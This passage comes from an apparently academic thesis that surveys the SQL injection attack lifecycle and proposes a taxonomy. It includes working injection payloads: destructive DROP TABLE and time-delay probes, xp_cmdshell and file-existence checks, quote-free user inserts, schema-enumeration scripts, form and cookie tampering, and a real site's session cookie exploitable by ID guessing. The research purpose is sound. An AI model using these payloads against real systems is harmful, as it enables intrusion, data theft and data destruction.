subroutines in the RDBMS. The potential of these procedures is directly connected to the
functions they can perform. For this reason, the hacker must first determine which
RDBMS is being used by the application and be acquainted to the system stored
procedures that RDBMS exposes.
4String Concatenation for Building Dynamic SQL
The Web paradigm is all about one-to-one connections between parties, hence, an
experience a particular user undergoes does not necessarily have to be shared by others.
1; Drop Table Products

attack taxonomy •
This is only possible due to dynamic construction of SQL statements. The way this
construction occurs will determine the success of an eventual SQL Injection attack. If
developers use a string concatenation approach in order to build dynamic statements,
there is a pretty good chance the attacker can manipulate it to his advantage, whereas
using a parameterized approach makes things a whole lot more difficult. All the
examples shown so far trust on string concatenation when building statement since this
is the most commonly used practice amongst developers. In the Defensive Tactics chapter
both techniques will be compared.
4INTO
The INTO clause can be used to redirect query yieldings to different sources other than
the regular query output stream. For example, a SELECT statement could be outputted
into a table, rather than into the calling application’s buffer. Now the OUTFILE instruction
permits to do something a lot more interesting. It has the ability to output contents to a
file, which can be used to post information on a Web server or to create a new secret
ASPX page the hacker may use at will.
4Weak Policies and Principles
Principles and policies play an important role in defending against SQL Injection attacks.
Many of the examples herein shown could be prevented if, for example, the least
privilege principle is being used. Accounts defined in the database are used by database
connections to access the database. An attacker could only use attack methods that
execute SQL statements associated with defined privileges in the account used by the
application (Landsmann & Strömberg 2003). In the Defensive Tactics chapter this subject
will be properly addressed.

attack taxonomy •
4 Poking for Vulnerabilities
Assessing which vulnerabilities are present will serve to steer the attack in terms of
determining if the prerequisites for specific attack methods are met, which in turn will
relate back to the attack objectives previously formulated.
4Unvalidated Input
Unvalidated input is in essence what makes SQL Injection possible. Unchecked
parameters to SQL queries that are dynamically built can be used in SQL Injection attacks.
These parameters may contain SQL keywords, e.g. INSERT, or SQL control characters such
as quotation marks and semicolons (Landsmann & Strömberg 2003). Determining where
and how user inputs are left unchecked is probably the hardest and most important step
of the whole attack lifecycle. This observation yields two action items the attacker must
attend to: the “where”, and the “how”.
The “where” part relates to applicational entrypoints, in other words, the attacker must
find, whether automatically or manually, which places on the application expect some
kind of user interaction and how these can be invoked. In a Web application, possible
entrypoints are all fields on a Web form, URL parameters, cookies and even HTTP
headers. As to the “how” part, the attacker’s experience plays an enormous role as an
experienced analytical mind is required. Induction pavements the way to solving the big
puzzle of understanding the runtime interactions of the application under attack. The
best analogy would be a researcher conducting action research.
Error messages and time delays are probably the best means to access both the “where”
and the “how” action items. These will be described over the next coming topics.

attack taxonomy •
4Error Message Feedback
Error messages that are generated by the RDBMS or by other server-side component may
be bubbled-up to client-side and rendered in the Web browser without any kind of
alteration. While these messages can be useful during development for debugging
purposes, they can also constitute risks to the application since attackers may use them to
obtain information about database or script structure in order to construct their attack
(Landsmann & Strömberg 2003). Error messages may also reveal additional information
about the environment, or the database. For example, if a hacker attempts to convert a
string into an integer, the full contents of the string is returned in the error message
(Anley 2002b), e.g.:
This method could be very handy in determining, for example, the list usernames on a
login table. Error messages can be used to render the results of an attack as well. The
example demonstrated on the «Real Environment Test» shown on the Experimenting
chapter uses an error message to render the list of files and directories on the root of the
C drive as part of a successful SQL Injection attack.
Error messages can also be useful in determining if a specific entrypoint is prone to SQL
Injection. On the same real example, the attack started by determining if the search
textbox was prone to SQL Injection by means of a single quotation mark raising a syntax
error.
select CreditCardHolder from CreditCards
UNION All
Select 1
Msg 245, Level 16, State 1, Line 1
Conversion failed when converting the nvarchar value 'John Doe' to data type
int.

attack taxonomy •
4Time Delays
The expression «the sound of silence» is a good analogy for this technique. More
experienced developers will conceal runtime error messages from showing to the
end-user. Many may do it on a pure usability basis, whereas others are aware error
messages pose a security risk. Still, the attacker must have some kind of positive feedback
whenever he is poking around for vulnerabilities or else it will be totally impossible to
asses if an attack is having any effect on a specific entrypoint. An ingenious workaround
is the use of time delays. The idea is simple, apart from an elite of mission-critical
applications, most user-interfacing applications, especially Web applications, have to deal
with somewhat generous latency times when interfacing across different functional
modules. Let’s consider the following injected statement:
This statement will cause the server to put to sleep the current request for fifty seconds. If
a system usually responds in a second or two and now the response took more than fifty
seconds, then the injection attack was definitely successful even if no error messages have
been used to output any information.
For example, if the hacker wanted to determine if the current security context used by the
application to authenticate against the RDBMS is the sysadmin’s context, then this
statement would do the trick:
There are other time delay type of statements that could be used, just in case someone is
watching over the existence of WAITFOR:
if (select user) = 'sa' waitfor delay '0:0:5'
'; waitfor delay '0:0:50' --

attack taxonomy •
This statement will use the standard network PING command to ping the LOCALHOST
for ten seconds. Another not so clean option, would be to use a WHILE cycle to
increment an integer variable, but this approach could be perceived as a denial of service
attack as it would consume the server’s CPU processing time.
Here are a set of data manipulation examples that use this technique (Anley 2002a):
Does the 'pubs' sample database exist?
Having run this:
and this:
Are there any rows in the table?
…and does that row indicate that the file exists?
if (select is_file from pubs..tmp_file) > 0 waitfor delay '0:0:5'
insert into pubs..tmp_file exec master..xp_fileexist 'c:boot.ini'
insert into pubs..tmp_file exec master..xp_fileexist 'c:boot.ini'
create table pubs..tmp_file (is_file int, is_dir int, has_parent int)
if exists (select * from pubs..pub_info) waitfor delay '0:0:5'
exec xp_cmdshell N'ping -n 10 127.0.0.1'

attack taxonomy •
4Uncontrolled Variable Size
Variables that allow storage of data that is larger than expected may allow attackers to
enter modified or fabricated SQL statements (Landsmann & Strömberg 2003). On the
«Real Environment Test» shown on the Experimenting chapter the field length of the
search textbox could not accommodate the length of the injected script. Still, the
application only implemented restricted field length at client-side, but failed to implement
the same failsafe at server-side. Because HTML is a user-editable frontend, it was fairly
simple to override the client-side field length limitation and proceed with the attack.
Scripts and applications that do not control variable length may even permit other
attacks, such as buffer overrun. However, newer platforms such as the .NET Framework
from Microsoft do not impose a limitation on many of their strong data types, e.g. string,
arrays, streams, etc. In reality there is a theoretical hard-to-reach limit. Though database
fields are explicitly limited in their lengths, the same does not happen on the variables
used by the application. If true that a runtime error will be thrown by the RDBMS if the
application tries to insert a value bigger than the allotted field length, if an attacker
successfully injects a very large string and alters the carrier query it most certainly will not
imply that a database field length will be violated. Unfortunately the only way to ensure
variable size is not an exploitable asset is having developers painfully comparing the
length of the variables received to the database field lengths. Nor this is a time
consuming task, but some applications, typically Web applications, tend to undergo
rapid development cycles and short change-management plans, which completely
undermines the concept of comparing lengths.

attack taxonomy •
4Type Casting & Variable Morphism
Entrypoints that deal with numeric values are a good place to start assessing the
application’s proneness to implicit type casting and variable morphism. With numeric
values, it is possible to exploit a query simply by using basic arithmetic operations. For
instance, let's look at the following HTTP request:
Testing this request for SQL Injection is very simple. One attempt is done by injecting 4' as
the parameter and the other is done using 3 + 1. Assuming this parameter is passed to
an SQL request, the result of the two tests will be the following two SQL queries:
Whereas the first query will definitely generate an error, or at least an applicational neatly
response stating the product was not found or that an error has occurred, the second
query will yield product number 4.
Now let’s suppose this application’s developer is someone somehow aware of the SQL
Injection threat and that he double checks all input for single quotation marks using a
simple function such as this:
Although the hacker found a nice and cool entrypoint for perpetrating an attack, the
numeric field, it is impossible to inject any complicated statements as single quotation
function escape(input )
escape = replace(input, "'", "''")
end function
SELECT * FROM Products WHERE ProdID = 4'
SELECT * FROM Products WHERE ProdID = 3 + 1
<a href="/eCommerceSite/productDetails.asp?ProdID=4">....</a>

attack taxonomy •
marks will be rendered as strings, thus making the injected statements useless. For
example, inserting values on a table would be impossible. Suppose the hacker wanted to
insert a new entry into the users table. If he did not mind using a numeric username and
a numeric password, then the following statement would work:
It would work for the simple reason the RDBMS will automatically cast numeric values to
string values implicitly if the target column is of type char, or varchar (see Table 3 - Explicit
and Implicit Type Conversions in MS SQL Server 2005 on page 149.
4Single Quotation Marks in Building Dynamic Queries
If the application or one of its stored procedures uses string concatenation for
constructing dynamic SQL statements, then there is a pretty good chance single
quotation marks on the carrier query can be manipulated in order to piggy-back a
second statement. On the «Real Environment Test» shown on the Experimenting chapter,
a single quotation mark on a textbox was all it took to cause a syntax error and raising an
error message. But there are cases where developers filter single quotation marks as in
the above example. Fortunately, there are ways to conceal single quotation marks or even
discard the need for them:
Using the char function it was possible to describe a string on a statement event without
using any quotation marks. This technique can be extrapolated to other scenarios as well.
insert into users values(777,
char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),
char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),
0xffff)
insert into users values(776,123,123,xffff)

attack taxonomy •
4Discovering Database Objects
Many of the samples presented required a somewhat magical understanding of the
database structure, but in reality the database structure is very much kept hidden from
the user. Uncovering the inner structure of the RDBMS will require the use of DML
statements and the DDL stack as well. Discovering the database structure is therefore the
last step of poking for vulnerabilities as it will need to combine several of the atomic
vulnerabilities and methods previously assessed, yet, it precedes the choice of means for
perpetrating the attack. For this matter, a list of injectable handy sample scripts will be
herein presented.
Getting an approximate count for all the tables:
Getting an exact count for all the tables:
DECLARE @SQL VARCHAR(255)
SET @SQL = 'DBCC UPDATEUSAGE (' + DB_NAME() + ')'
EXEC(@SQL)
CREATE TABLE #foo
(
tablename VARCHAR(255),
rc INT
)
INSERT #foo
EXEC sp_msForEachTable
'SELECT PARSENAME(''?'', 1),
COUNT(*) FROM ?'
SELECT tablename, rc
FROM #foo
ORDER BY rc DESC
DROP TABLE #foo
SELECT [TableName] = so.name, [RowCount] = MAX(si.rows)
FROM sysobjects so, sysindexes si
WHERE so.xtype = 'U' AND si.id = OBJECT_ID(so.name)
GROUP BY so.name ORDER BY 2 DESC

attack taxonomy •
Getting a full report on the tables’ space usage:
DBCC UPDATEUSAGE(0)
CREATE TABLE #t (
id INT,
TableName VARCHAR(255),
NRows INT,
Reserved FLOAT,
TableSize FLOAT,
IndexSize FLOAT,
FreeSpace FLOAT )
INSERT #t EXEC sp_msForEachTable 'SELECT
OBJECT_ID(PARSENAME(''?'',1)),
PARSENAME(''?'',1),
COUNT(*),0,0,0,0 FROM ?'
DECLARE @low INT
SELECT @low = [low] FROM master.dbo.spt_values
WHERE number = 1 AND type = 'E'
UPDATE #t SET Reserved = x.r, IndexSize = x.i FROM
(SELECT id, r = SUM(si.reserved), i = SUM(si.used)
FROM sysindexes si
WHERE si.indid IN (0, 1, 255)
GROUP BY id) x
WHERE x.id = #t.id
UPDATE #t SET TableSize = (SELECT SUM(si.dpages)
FROM sysindexes si
WHERE si.indid < 2 AND si.id = #t.id)
UPDATE #t SET TableSize = TableSize +
(SELECT COALESCE(SUM(used), 0)
FROM sysindexes si
WHERE si.indid = 255 AND si.id = #t.id)
UPDATE #t SET FreeSpace = Reserved - IndexSize
UPDATE #t SET IndexSize = IndexSize - TableSize
SELECT tablename, nrows,
Reserved = LTRIM(STR(
reserved * @low / 1024.,15,0) +
' ' + 'KB'),
DataSize = LTRIM(STR(
tablesize * @low / 1024.,15,0) +
' ' + 'KB'),
IndexSize = LTRIM(STR(
indexSize * @low / 1024.,15,0) +
' ' + 'KB'),
FreeSpace = LTRIM(STR(
freeSpace * @low / 1024.,15,0) +
' ' + 'KB')
FROM #t
ORDER BY 1
DROP TABLE #t

attack taxonomy •
Getting a full report on the columns of a table including field types and lengths:
Declare @TableName varchar(255)
set @TableName = 'Product'
SELECT
COLUMN_NAME,
DATA_TYPE,
isnull(CHARACTER_MAXIMUM_LENGTH,0) AS 'LENGTH',
IS_NULLABLE,
ISNULL((SELECT 'Y' FROM SYSFOREIGNKEYS WHERE
FKEYID =ID AND FKEY=COLID),'N') as 'IsForeignKey',
Ordinal_Position,
SYSCOLUMNS.IsComputed,
IsIdentity,
IsRowGuidCol
FROM
SYSCOLUMNS,
(SELECT
COLUMN_NAME,
IS_NULLABLE,
DATA_TYPE,
CHARACTER_MAXIMUM_LENGTH,
Ordinal_Position,
COLUMNPROPERTY(OBJECT_ID(@TableName),
INFORMATION_SCHEMA.COLUMNS.COLUMN_NAME,
'IsIdentity') AS IsIdentity,
COLUMNPROPERTY(OBJECT_ID(@TableName),
INFORMATION_SCHEMA.COLUMNS.COLUMN_NAME,
'IsRowGuidCol') AS IsRowGuidCol
FROM
INFORMATION_SCHEMA.COLUMNS
WHERE
TABLE_NAME =@TableName) AS A
WHERE
ID
IN
(SELECT ID FROM SYSOBJECTS WHERE TYPE='U' AND NAME
=@TableName)
AND
A.COLUMN_NAME =NAME
Order By
Ordinal_Position

attack taxonomy •
4Offline Research
Many Web and regular applications are not developed in-house but are software
packages more or less distributed across the globe. For example, many of the large
corporations use SAP R/3 as their ERP system, Siebel for CRM and countless others for
addressing internal and external business demands. If a company wanted to implement
an e-Commerce site, it would probably purchase some kind of software package or
pre-built framework, instead of painfully developing everything from scratch as
companies have to struggle with Heterogeneity and Change in order to stay in business.
Identifying if a particular software package is being used can work to the offender’s
advantage even knowing that the software house will constantly search and correct
vulnerabilities. Let’s suppose that our attacker is a disgruntled employee who carries is
daily routine using the SAP GUI. Since he knows the company is using SAP R/3 as their
ERP platform, let’s suppose that through social engineering or using any other method
he finds out that SAP is running MS SQL Server as its backend RDBMS. Holding this
information, the attacker builds a lab environment at home using pirate copies of the
software easily obtained from the Internet. Because he owns the environment, he
replicates his regular tasks on the SAP GUI. At the same time he uses a tool called SQL
Server Profiler that is shipped with MS SQL Server in order to discover how the
applicational components on the business layer convert user input into dynamic
statements (see Figure 8 - Classic Three-Tier Web Architecture Model on page 40). There
are similar tools to accomplish the same result as SQL Server Profiler for other RDBMS
vendors. These tools enable the possibility to sniff which statements are being executed in
real-time against the RDBMS. Understanding how exactly the application takes user input
and handles it to the backend RDBMS will allow our disgruntled employee to bypass all
the difficulty of poking for vulnerabilities using an inductive approach and jump ahead to
a deductive approach based on direct observation.

attack taxonomy •
Figure 29 - Sniffing SQL Statements Processed by the RDBMS in Real-Time
In the comfort of his home, the offender can take as much time as he wants to study
and prepare the attack without taking any risks. Discovering if the application has been
developed in-house or if it is a software package is very much relevant as it may allow the
hacker to reduce the chances of being exposed and provide the necessary time to
optimize the attack.
4 Choosing Means
Once the attacks objectives are set-out, tools ready, prerequisites met, and weak spots
targeted, the attacker must choose the means for perpetrating the attack. The attack
lifecycle must be seen as an upward spiral mounting throughout the attack’s lifespan as
attackers may iteratively combine steps in order to fulfil their objectives. So it is plausible
the attacker will revisit this step on several occasions when accounting for any of the

attack taxonomy •
previous steps. Choosing means will allow the attacker to choose the delivery method for
the malicious payload which ultimately, depending on the attack’s objectives, could
encompass the full extent of available means of attack. There are numerous ways to
inject an application, spanning from very low-level network protocols to the application
layer of the OSI model (see Figure 5 - The Seven Layers of the OSI Model on page 32).
Because SQL Injection is a logical type of attack, the author prefers to concentrate on
delivery methods that promote exploitation of logic instead of low-level network
protocols. Furthermore, though SQL Injection is not a Web-specific issue, a webbed
environment will be used to describe the delivery methods as the Web offers an ample
scenario easily extrapolated to other contexts.
4Web Form Manipulation
An attacker can use forms, the typical frontend of a tiered application, to enter parts of
SQL statements such as SQL keywords, control characters or data in order to manipulate
underlying application server-side scripts or programs (Landsmann & Strömberg 2003).
Forms do not necessarily expose user-input fields, but they always contain fields for
controlling the flow of information. Regardless if the form exposes fields for human
interaction, or internal fields for flow control, or even a mixture of both, the most
common configuration, still, within the HTML code there are client-side editable fields. At
first Web forms may perceived as non-editable as they are the output of a server-side
application component, but it has to do with the basics. HTTP, the application-level
protocol used by Web traffic (see Figure 5 - The Seven Layers of the OSI Model on page
32) is, by nature, a sessionless protocol designed to operate disconnected of its data
source. In some rare, limited periods, there is a data exchange between client and server,
but once the client has everything he needs, the connection is severed and the user
navigates the page offline. The browser is the piece that handles this offline handling of

attack taxonomy •
downloaded resources which are frequently cached on disk for faster user experience.
The HTML page containing the Web form holding the information context is therefore
stored locally. The user may even save the page explicitly to his hard disk and look at the
client-side code of the form, using Notepad for example, as in the following sample:
The field of the form can clearly be seen, as well as their value and type. If, for example, a
field imposed a limit for the number of characters permitted, e.g. the MaxLength for the
ProductID field, the hacker could simple change that limit in order to accommodate the
length of the injected script. Typically, hidden fields are used by the application to control
the flow of information and navigation context, e.g. the site section the user in on, his
language preferences, etc., whereas visible fields are meant for user interaction.
Regardless the field type, all fields are potential entrypoints for SQL Injection. However,
<html>
<head><title>
Sample Page
</title></head>
<body>
<form name="form1" method="post" action="Default.aspx" id="form1"
enctype="multipart/form-data">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwULLTEzMTU4Nzk0NTQPZBYCAgMPFgIeB2VuY3R5cGUFE211bHRpcGFydC9mb3JtLWR
hdGFkZEeyI59iHqwSX1KSk9BRXTYZ8nOM" />
</div>
<div>
<input name="price" type="hidden" id="price" value="332"
MaxLength="10" /><br />
<input name="ProductID" type="text" id="ProductID" value="123" />
<input name="CustomerName" type="text" id="CustomerNamme" value="" />
<input type="submit" name="doSubmit" value="Submit" id="doSubmit" />
</div>
<div>
<input type="hidden" name="__EVENTVALIDATION"
id="__EVENTVALIDATION"
value="/wEWBAKoieCRBgKjjN2hAwKbufQdAqqp28wHXcqFkrTTO8aON7Y0yh/p6BfnGL8=" />
</div>
</form>
</body>
</html>

attack taxonomy •
experience indicates that hidden fields used for persisting the application’s concept of a
session-driven user experience are the most susceptible to injection attacks since
developers do not expected them to be manipulated. In many cases, developers trust
their development environments to handle the session-driven navigation in a seamless
way, hence it is very common that these fields are simply left unchecked. The last thing
remaining is to alter the form’s target location. When the form is executed within a server
environment, it will most certainly refer to network resources using relative paths in order
to keep the application loosely-coupled with the server. The name of the resource that
will be handling the request can be clearly identified within the form declaration tag:
All the hacker would have to do is changing the value for the action property so it would
contain the full URL of the network resource, e.g.:
Once he opens the local HTML page on the browser and presses the submit button, the
manipulated form containing injected code is posted back to server and processed.
4URL Header Manipulation
There are two ways of posting data from a Web form to a server resource: POST and GET.
POST uses an HTTP header encoded in the form of a stream in order to send its contents
across the wire. These contents can be rather large and include binary files and humans
do not get to see the actual contents. GET uses the URL of the resource in order to pass
text-based arguments, e.g. http://someServer/somePage.aspx?ProductID=1&Lang=PT. It
<form name="form1" method="post" action="http://someSite/someDir/Default.aspx"
id="form1" enctype="multipart/form-data">
<form name="form1" method="post" action="Default.aspx" id="form1"
enctype="multipart/form-data">

attack taxonomy •
is limited to 255 characters, although some browsers and Web servers allow more, and
the user actually sees which contents are being sent to the server. Because these settings
are accessible through the browser’s address bar, users can manipulate them at will.
Setting the method property of a form to GET or simply calling the target URL configured
on the action property with additional parameters is just the same. A hacker could very
well manipulate the parameters on the URL, also known as querystring, into his
advantage. It is very common to find this configuration on product lists that require the
user to select a particular product in order to get more details. This is usually done
through the use of a querystring containing the product’s primary key to access another
network resource that based on the product’s id will query the database and yield the
specifications for the selected product.
Apart from the string length limitation imposed by the HTTP/1.1 standard, but extended
by numerous browsers and Web servers, URL header manipulation will allow to do just
about everything Web form manipulation allows. Furthermore, URL-based strings are
probably the best source for finding numeric fields being sent to the database, opening
the door for exploitation of type casting and variable morphism.
4HTTP Header Manipulation
Whenever an HTTP request or response is issued, there is a set of headers enveloping the
request. These are known as HTTP headers and can contain various types of information.
HTTP headers are also known as response headers or server variables, although they
contain information on both the client and the server. Applications with some level of
complexity make use of the information sources made available at the HTTP headers
level. The following table shows some common HTTP headers found on regular HTTP
requests:

attack taxonomy •
Name Description
ALL_HTTP
Returns all HTTP headers sent by the client. Always prefixed with HTTP_
and capitalized
ALL_RAW Returns all headers in raw form
APPL_MD_PATH Returns the meta base path for the application for the ISAPI DLL
APPL_PHYSICAL_PATH Returns the physical path corresponding to the meta base path
AUTH_PASSWORD Returns the value entered in the client's authentication dialog
AUTH_TYPE The authentication method that the server uses to validate users
AUTH_USER Returns the raw authenticated user name
CERT_COOKIE Returns the unique ID for client certificate as a string
CERT_FLAGS
bit0 is set to 1 if the client certificate is present and bit1 is set to 1 if the
cCertification authority of the client certificate is not valid
CERT_ISSUER Returns the issuer field of the client certificate
CERT_KEYSIZE Returns the number of bits in Secure Sockets Layer connection key size
CERT_SECRETKEYSIZE Returns the number of bits in server certificate private key
CERT_SERIALNUMBER Returns the serial number field of the client certificate
CERT_SERVER_ISSUER Returns the issuer field of the server certificate
CERT_SERVER_SUBJECT Returns the subject field of the server certificate
CERT_SUBJECT Returns the subject field of the client certificate
CONTENT_LENGTH Returns the length of the content as sent by the client
CONTENT_TYPE Returns the data type of the content

attack taxonomy •
Name Description
GATEWAY_INTERFACE Returns the revision of the CGI specification used by the server
HTTP_<HeaderName> Returns the value stored in the header HeaderName
HTTP_ACCEPT Returns the value of the Accept header
HTTP_ACCEPT_LANGUAGE Returns a string describing the language to use for displaying content
HTTP_COOKIE Returns the cookie string included with the request
HTTP_REFERER
Returns a string containing the URL of the page that referred the request
to the current page using an <a> tag. If the page is redirected,
HTTP_REFERER is empty
HTTP_USER_AGENT Returns a string describing the browser that sent the request
HTTPS
Returns ON if the request came in through secure channel or OFF if the
request came in through a non-secure channel
HTTPS_KEYSIZE Returns the number of bits in Secure Sockets Layer connection key size
HTTPS_SECRETKEYSIZE Returns the number of bits in server certificate private key
HTTPS_SERVER_ISSUER Returns the issuer field of the server certificate
HTTPS_SERVER_SUBJECT Returns the subject field of the server certificate
INSTANCE_ID The ID for the IIS instance in text format
INSTANCE_META_PATH The meta base path for the instance of IIS that responds to the request
LOCAL_ADDR Returns the server address on which the request came in
LOGON_USER Returns the Windows account that the user is logged into
PATH_INFO Returns extra path information as given by the client

attack taxonomy •
Name Description
PATH_TRANSLATED
A translated version of PATH_INFO that takes the path and performs any
necessary virtual-to-physical mapping
QUERY_STRING
Returns the query information stored in the string following the
question mark (?) in the HTTP request
REMOTE_ADDR Returns the IP address of the remote host making the request
REMOTE_HOST Returns the name of the host making the request
REMOTE_USER Returns an unmapped user-name string sent in by the user
REQUEST_METHOD Returns the method used to make the request
SCRIPT_NAME Returns a virtual path to the script being executed
SERVER_NAME
Returns the server's host name, DNS alias, or IP address as it would
appear in self-referencing URLs
SERVER_PORT Returns the port number to which the request was sent
SERVER_PORT_SECURE
Returns a string that contains 0 or 1. If the request is being handled on
the secure port, it will be 1. Otherwise, it will be 0
SERVER_PROTOCOL Returns the name and revision of the request information protocol
SERVER_SOFTWARE Returns the name and version of the server software that answers the
request and runs the gateway
URL Returns the base portion of the URL
Table 4 - Common HTTP Server Variables
> adapted from (W3 Schools 2006) <
Similarly to fields on a Web form, or to querystring parameters, HTTP headers can be
manipulated to the attacker’s advantage. If by any chance any HTTP header is used in the

attack taxonomy •
construction of a dynamic SQL statement, then there is a chance to manipulate the
headers in order to perform a SQL Injection attack. The special thing about HTTP headers
is the fact they cannot be manipulated using a regular browser. The attacker would have
to use some third party tool, or build a program, e.g. using the System.Net.WebClient
class of the Microsoft .NET Framework, in order to be able to issue an HTTP request and
manipulate the headers.
As a real example, ILIAS Open Source, a popular Web-based learning management
system had, and maybe still has, an entrypoint vulnerable to SQL Injection at the HTTP
header level as they implement the following logic:
The HTTP_REFERER header which contains the URL of the page that referenced the
request could be easily manipulated in order to inject malicious statements.
4Cookie Poisoning
Cookies are text files stored by the browser on the user’s hard disk on behalf of the Web
application. These have a maximum size of 4 KB and are used to persist user settings
such as preferred language, preferred currency, etc., so the next time the user accesses
the Web resource, contents get automatically contextualized to the user’s preferences. It
is also very common to authenticate users using cookies, thus avoiding the hassle of
filling in a login and a password each time the user uses the site. There is another
category of cookies that are not persisted to the user’s hard disk. These are named
session cookies. They have the same limitations and role, but live inside an HTTP header
sent back and forward throughout the duration of the site experience. Although cookies
hold very limited information, because their role is to primarily hold user-specific data
$sql="INSERT INTO tracking_temp VALUES('$HTTP_REFERER')"

attack taxonomy •
with direct consequences on the contents to be rendered, it is almost 100% guaranteed
information stored in cookies will participate in the formulation of dynamically generated
SQL statements. Since persistent cookies are stored on file, they can be very easily located
and edited, let’s say using Notepad. Things start to get a little more interesting when
cookies are used to authenticate users, sometimes on a very naive way as in the following
real example:
This cookie is generated by a very well known certification study guides e-Commerce
website. This website allows any guest user to register and from that point on he is
considered a member of the website, just like any real customer. Although this cookie is
not very human-readable, it is possible to determine the user is being identified by a
numeric id. If someone deletes the cookie and repeatedly registers on the site, the user id
is incremented, just like an auto-numbered primary key on a database. Now this cookie
has two major problems that a sharp mind would exploit. First, a program that would
decrement the user id would allow the hacker to logon on that user’s behalf even
without knowing the corresponding login and password. Second, the user id is very likely
to be used on a WHERE clause of a query that queries the user’s table for a user whose
primary key matches the id on the cookie. As established previously, numeric fields are an
excellent place to start an injection attack, even if it means doing it from within a cookie.
With just a few lines of code, the attacker could forget all about the browser’s limitations
and inject directly the Web resource via the HTTP_COOKIE HTTP header.
CFID□1942327□www.testking.com/□1536□2381306624□32006981□2214985776□29804244□*□CFTOKEN
69749902□www.testking.com/□1536□2381306624□32006981□2215085776□29804244□*□USERID□3812
46□www.testking.com/□1536□1669978496□30206549□2485775776□29804244□*□USERVALID□CD1B970
B%2DB8E4%2D41E8%2D85DC%2D2EE2F13F2B4F□www.testking.com/□1536□4117451264□29819516□3108
155632□29813508□*□CARTID□0□www.testking.com/□1536□1462948352□30215813□3108355632□2981
3508□*□AFFILIATION□0□www.testking.com/□1536□3061045632□30005383□2485875776□29804244□*

attack taxonomy •
4 Designing the Query
Designing the query is the final step on the chain of iterative steps. By the time the final
query is to be designed, the hacker has a clear idea of the objective he wishes to
accomplish, he has researched and assessed several attack methods that can be of some
use, ascertained which prerequisites are present, tested for weaknesses, and chose the
delivery method for the attack. It is now time to design a query that needs to follow the
proper structure of an SQL query expected by the RDBMS, while accounting for all the
constraints imposed by the environment. The hacker wants little exposure and fortunately
the default behaviour of Web servers is to only log requests, not the actual information
contained on the request.
Figure 30 - Typical Activity Log of a Web Server
Still, successful SQL statements that cause data to change within the RDBMS will be
logged on the database transaction log. This fact may have little consequence as
database transaction logs tend to overgrow the actual size of the database and their
inactive part needs to be purged regularly by means of a truncate procedure.
Nonetheless, properly designing the query that will carry out the attack is a crucial step in
the whole attack lifecycle as it will inevitably determine the attack’s success.

attack taxonomy •
TOWARD THE TAXONOMY
TOWARD THE TAXONOMY
Taxonomy, from Greek ταξινομία (taxinomia) from the word taxis = order and the word
nomos = law, may refer to either a hierarchical classification of things, or the principles
underlying the classification. Almost anything, animate objects, inanimate objects, places,
and events, may be classified according to some taxonomic scheme (Wikipedia 2006b).
Like concept trees, taxonomies constitute a relatively small and manageable space of
information and are used to assist users in finding relevant information (Yip Chung et al.
2002). Whereas concept trees organize concepts from general to specific, taxonomies
offer a breakdown of navigable structures. These are mainly built and maintained
manually by human experts since constructing taxonomies requires domain knowledge,
something still somewhat cumbersome for automatic procedures to handle. Building a
new taxonomy is therefore not a simple task. Hansman (2002) compiled a set of ten
requirements well-formed consistent taxonomies should adhere to. These requirements
are herein transcript and will be used as basis for constructing the SQL Injection
taxonomy of attacks:
• Accepted – The taxonomy should be structured so that it can be become
generally approved;
• Comprehensible – A comprehensible taxonomy will be able to be understood
by those who are in the security field, as well as those who only have an
interest in it;
• Completeness/Exhaustive – For a taxonomy to be complete/exhaustive, it
should account for all possible attacks and provide categories for them. While it
is hard to prove a taxonomy is complete or exhaustive, they can be justified
through the successful categorisation of actual attacks;

attack taxonomy •
TOWARD THE TAXONOMY
• Determinism – The procedure of classifying must be clearly defined;
• Mutually exclusive – A mutually exclusive taxonomy will categorise each attack
into, at most, one category;
• Repeatable – Classifications should be repeatable;
• Terminology complying with established security terminology – Existing
terminology should be used in the taxonomy so as to avoid confusion and to
build on previous knowledge;
• Terms well-defined – There should be no confusion as to what a term means;
• Unambiguous – Each category of the taxonomy must be clearly defined so that
there is no ambiguity as to where an attack should be classified;
• Useful – A useful taxonomy will be able to be used in the security industry. For
example, the taxonomy should be able to be used by incident response teams.
There are countless frameworks and guidelines for building taxonomies, but this work
got its inspiration from a semi-automatic method called Thematic Mapping (Yip Chung
et al. 2002). Though this method is meant for assisting in the process of building a
taxonomy of documents, e.g. a documents directory, many of its underlying steps offer a
valuable piece of input in building a new taxonomy. The process begins by extracting
signatures from the available content. A signature is a noun or noun phrase that is
clustered into a concept. Concepts are them organized in a tree structure like a concept
tree. From this point on, concepts are labelled accordingly to their meaning in the
hierarchy. Good labeling is critical in easy navigation of a large taxonomy. At the end of
the procedure, a semantic representation of an initial ad-hoc reality will be obtained. This
representation will be very much alike an XML-based representation.

attack taxonomy •
TOWARD THE TAXONOMY
4 Unifying Definition for SQL Injection
The first step of partitioning a body of Knowledge is to define the subject that is going to
be structured. The critical literature review process revealed that literature sources do
share a somewhat common understanding of the research topic, still, a global definition
has never been proposed (see «Definition for SQL Injection» on the Literature Review
chapter). For this reason, and because there is enough support evidence, a unifying
definition for SQL Injection is herein proposed. From this point on the following proposed
definition will be used as underlying principle whenever SQL Injection is in some manner
referred to:
SQL Injection is a flaw on the input validation logic of a tiered
application that via a valid frontend receives user input containing
malicious patterns used on the construction of a dynamically-generated
legitimate SQL query, ultimately leading to the arbitrary execution of
SQL and operating system commands on the hacker’s behalf using the
application’s security context.
This definition is based upon three pillars, or main causative factors, formulated during
the critical literature review phase: i) dynamically-generated string literals; ii) embedding
into SQL statements; iii) escaping. These factors are transversally cross-sectioned by
a) tiered application model; b) user input validation logic; c) textual representation of
database query semantics.

attack taxonomy •
TOWARD THE TAXONOMY
4 Taxonomy Formulation
The proposed taxonomy takes into account the lifecycle of SQL Injection attacks and the
inherent methodologies of each step as per the survey of existing techniques presented
earlier. This taxonomy is kept at a high-level as the specifics of each implementation will
vary according to the conditions and the skills of the attacker. The following diagram
pretends to offer an easy-to-use graphical representation of the taxonomy:
Figure 31 - Taxonomy of SQL Injection Attacks
SSeettttiinngg tthhee
OObbjjeeccttiivvee
CChhoooossiinngg
tthhee MMeetthhoodd
EExxaammiinniinngg
PPrreerreeqquuiissiitteess
PPookkiinngg ffoorr
VVuullnneerraabbiilliittiieess
CChhoooossiinngg
MMeeaannss
DDeessiiggnniinngg tthhee
QQuueerryy
data
manipulation
authentication
bypass
information
retrieval
information
manipulation
information
fabrication
information
deletion
external
datasources
OS
manipulation
